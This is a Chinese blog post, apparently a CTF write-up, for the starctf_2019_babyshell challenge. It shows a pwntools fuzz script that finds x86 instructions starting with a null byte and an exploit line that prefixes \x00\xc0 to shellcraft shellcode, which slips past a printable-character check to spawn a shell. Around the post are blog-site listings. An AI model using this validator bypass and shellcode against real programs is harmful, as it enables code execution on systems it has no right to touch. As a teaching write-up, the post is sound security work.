以\x00开头的shellcode&&starctf_2019_babyshell

最新推荐文章于 2023-04-14 23:18:22 发布
最新推荐文章于 2023-04-14 23:18:22 发布
阅读量971 收藏 4
点赞数 3
分类专栏: linux_pwn 文章标签: linux 服务器 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123728509
版权

文章目录

为什么会有这个想法

虽然这个标题看起来很奇怪,但有时候其实可以用得上
有时候我们输入输出是通过read来进行的,并且中间不会涉及到strcpy,strcat这些函数,所以我们可以放心的在shellcode里面插入\x00

有时候其实我们需要利用到\x00,因为strcmp,strlen,等等包括很多时候自定义的函数实现都是以\x00作为结束的标志
光说没用,我们看例题

starctf_2019_babyshell

starctf_2019_babyshell
这里题逻辑很简单,输入shellcode,注意使用read读入的
在这里插入图片描述
中间有个校验
在这里插入图片描述
在这里插入图片描述
可以看到它让你shellcode里面只能是可见字符

思路

这个题目网上有两种解法,第一种就是利用可见字符写shellcode,这个我们暂时不考虑,我们看能不能绕过
因为它这个校验可以看到,while(*a),也就是我们一般写代码的思路,遇到\x00就不校验了,所以如果shellcode以\x00开头,那是不是就ok了?

难点

有汇编指令以\x00开头吗,还真有

from pwn import *
from itertools import *
import re

for i in range(1, 3):
    for j in product([p8(k) for k in range(256)], repeat=i):
        payload = b"\x00" + b"".join(j)
        res = disasm(payload)
        if (
            res != "        ..."
            and not re.search(r"\[\w*?\]", res)
            and ".byte" not in res
        ):
            print(res)
            input()

这里我是fuzz生成
要注意两个细节
我们要把payload变成bytes
最开始我是这样写的

   for j in product([chr(k) for k in range(256)], repeat=i):
        payload = b"\x00" + "".join(j).encode()

这样有什么问题呢,其实涉及到编码
在这里插入图片描述
这个时候是str,我们要转化成bytes

因为采用utf-8编码,所以\x7f后面的字符对应的bytes都是2byte
在这里插入图片描述
如果用ascii编码则无法编码\x80以上的
所以必须要用p8来生成

同时这里我加了一个if

if (
            res != "        ..."
            and not re.search(r"\[\w*?\]", res)
            and ".byte" not in res
        ):

…表示没有对应的汇编
第二个正则是防止出现[ecx]这种,因为可能导致无效地址访问
第三种是数据定义类型,这种可能会导致系统异常解释shellcode
所以我们最后也可以得到很多

这里我们就用\x00\xc0,可以看到正常解析同时绕过检查

在这里插入图片描述

exp

sl(b"\x00\xc0" + asm(shellcraft.sh()))
it()
azraelxuemo
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php配置16进制ascii码\x00的问题
qq_35358091的博客
06-16 1642
\x00在16进制ascii码中表示Null,php使用正则匹配替换如果写成这样 $content = preg_replace("/\x00/", "", $content); 会报Warning: preg_replace(): Null byte in regex in xxx. 表示正则不可以有Null,需要再加一个\对Null进行转义,应该写成这样 $content = preg_replace("/\\x00/", "", $content); ...
python中编码
sunxkd的博客
09-15 2312
python中的str对象其实就是"8-bit string" ,字节字符串,由unicode经过编码(encode)后的字节组成的, 本质上类似java中的byte[]。 而python中的unicode对象应该才是等同于java中的String对象,或本质上是java的char[]。 Python内部的字符串一般都是 Unicode编码,代码中字符串的默认编码与代码文件本身的编码是一致
关于编码的理解
Geoffrey_one的博客
07-05 3028
一、字节关于编码的理解始于字节这一数据格式。整型转字节类型使用bytes()函数,其他进制转2进制使用bin()函数。1. 定义    字节是一系列单字节的组合,每一个字节都是[0, 255](无符号)范围内组成。    单字节:一个字节8个数据位2. 转换(1) 字符串和字节串的相互转化    参考自:https://blog.csdn.net/baidu_19473529/article/de...
关于字符编码,你所需要知道的
qiuyepiaoling的专栏
07-12 1378
<br />字符编码的问题看似很小,经常被技术人员忽视,但是很容易导致一些莫名其妙的问题。这里总结了一下字符编码的一些普及性的知识,希望对大家有所帮助。还是得从ASCII码说起<br /> <br />说到字符编码,不得不说ASCII码的简史。计算机一开始发明的时候是用来解决数字计算的问题,后来人们发现,计算机还可以做更多的事,例如文本处理。但由于计算机只识“数”,因此人们必须告诉计算机哪个数字来代表哪个特定字符,例如65代表字母‘A’,66代表字母‘B’,以此类推。但是计算机之间字符-数字的对应关系必须得
解决\xa0 、 \u3000导致的编码问题
小龙在线
10-19 6934
当python要做编码转换的时候,会借助于内部的编码,转换过程是这样的:原有编码 -> 内部编码(UNICODE) -> 目的编码在读取文件的时候,可以让codecs来代劳。codecs读文件results.txt两部委:到2020年底重点城市生活垃圾得到有效分类(图) 英雄惜英雄! 传奇为格策叫冤:已尽力不应被批 中华关爱失能老兵和老人公益行活动启动仪式在京举行(组图) 国安酷暑作战满意拿分 谢峰
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
4. **编码和解码**:由于shellcode可能需要在网络传输中作为数据包的一部分,所以需要将其编码以逃避检测,然后在目标系统上解码并执行。 5. **测试和调试**:在沙箱环境或模拟器中测试shellcode,确保其在预期环境...
Android系统shellcode编写.zip_android_shellcode
09-23
在Android系统中,shellcode是一种特殊的代码片段,用于在获得程序执行权限后,实现特定功能,比如控制系统、执行恶意操作等。随着Android设备的广泛使用,Android系统的安全性变得至关重要,而shellcode的编写和...
shellcode_generate-test_framework
04-06
shellcode_generate-test_framework 非原创,来自 本次工程创建是win32空项目,使用的是VS2015编译relase/x86,编译之前进行如下设置: 创建工程时关闭SDL检查 属性->C/C++->代码生成->运行库->多线程 (/MT)如果是...
CDL_shellcode_源码
10-02
在IT领域,Shellcode是一种特殊的低级代码,通常用汇编语言编写,用于利用软件漏洞执行任意命令。Shellcode在安全研究和逆向工程中扮演着重要角色,它可以直接在目标进程中运行,绕过安全机制,执行攻击者指定的操作...
JMPESP.rar_jmp_jmp esp_jmp9.02 crack_shellcode_sp3 jmp esp
09-24
获取jmp esp地址程序,shellcode编写需要用到
shellcode编码
qq_38989921的博客
12-29 392
shellcode编码 将每个字符的ASCII码转换为十六进制,并在每个十六进制码之前添加“\x”。 I love you Jack \x49\x20\x6c\x6f\x76\x65\x20\x79\x6f\x75\x20\x4a\x61\x63\x6b
LOADRUNNER之汉字编码转换及\X00问题
08-02 736
我们在使用loadrunner做性能测试的时候经常会出现一些URL编码问题,如当参数中存在中文的时候 "Name=user", "Value=孟林", ENDITEM, 抓包的时候可以看到&user=%e5%ad%9f%e6%9e%97,然而我们在loadrunner中的脚本日志会发现并不是这样,其原因是测试脚本中汉字的编码是ACSII而网站中汉字的编码是UTR-8的形式,从...
Unicode 编码表
tiandyoin的专栏
04-14 4889
在Unicode中,区段(block)又称码块[1],是一组连续码位的范围;区段会给予唯一的名称,且区段与区段间不会重叠。通常一个最小的区段至少包含16个码位,即 hhh0到hhhF。而 Unicode区段,也称 统一码块。 一个区块可以明确地包含未分配的码位和非字符。[2] 不属于任何已命名区段的码位(例如尚未正式使用的第4-第13平面),上面码位关于区块的值会被设为 block="No_block".。相反地,每个分配的代码点都有一个“区段名称”的属性,表示出这个文字所在的区段。这仅由代码点确定。。。
ASCII GBK UTF-8 编码
Piwrim的博客
11-29 787
ASCII ASCII ((American Standard Code for Information Interchange): 美国信息交换标准代码)是基于拉丁字母的一套电脑编码系统,主要用于显示现代英语和其他西欧语言。它是最通用的信息交换标准,并等同于国际标准ISO/IEC 646。 表达方式 ASCII 码使用指定的7 位或8 位二进制数组合来表示128 或256 种可能的字符。标准ASCII 码也叫基础ASCII码,使用7 位二进制数(剩下的1位二进制为0)来表示所有的大写和小写字母,数.
解码shell code的/x00
|游梦空间|
04-26 1449
关于shell code,对我这个菜鸟来说真的是好难,汇编不懂,用汇编写,我都不敢想,不过在c++中还是可以提取的,只是有好多的/x00,很是烦啊` 最近在网上看到了解决这个问题的办法,如你提取的shell code是这样的/x55/x00/x52/x8B/xEC/x83/xEC/x20/x33/xC9/xC6/x00/xF5/x6D/xC6/x45/xF6/x73/xC6/x45/xF7/x76
ShellCode入门(提取ShellCode
05-16 520
什么是ShellCode: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcodeShellcode通常是以机器码形式编写的,所以我们要学习硬编码。 char shellcode[] = ...
0x02-逆向-执行环境变量
0pr
05-30 614
目录 今日目标 可以学到什么? 什么是 ShellcodeShellcode 是怎么编写出来的? Shellcode 测试 Shellcode 如何传递给程序? Bash 设置环境变量 `` $() 如何利用这个漏洞? 参考链接 今日目标 继续 narnia 系列。今天的目标是 narnia1。 首先,这个挑战本身很简单,但是可以细想一下背后的原理,还是有一些地方值得挖掘和理解。 这是 narnia1 的源码。 #include <stdio.h> int main
others_shellcode
最新发布
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统中用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存中,并被执行。由于others_shellcode本身就是已经准备好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值